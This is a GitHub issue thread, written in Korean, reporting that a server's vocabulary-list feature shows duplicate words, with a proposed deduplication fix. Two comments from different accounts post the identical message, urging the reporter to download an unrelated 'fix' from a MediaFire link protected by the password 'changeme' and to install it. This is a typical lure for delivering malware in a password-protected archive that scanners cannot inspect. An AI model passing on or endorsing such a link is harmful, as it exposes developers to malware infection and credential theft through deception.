### ISSUE TITLE
[BUG] 단어장에 중복 단어가 나타남

### ISSUE THREAD

**Issue by eunsu02** [GlowTales/GlowTales-Server#105]
### 🐞 버그 설명
사용자가 단어장을 불러올때 중복 단어가 화면에 나오는 문제

### 📸 Screenshots
![KakaoTalk_Photo_2024-08-27-16-41-48](https://github.com/user-attachments/assets/6d8a909c-7cbc-4bef-897c-32f49dda5db8)

### 🔜 추가 내용
중복 제거 로직을 추가

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
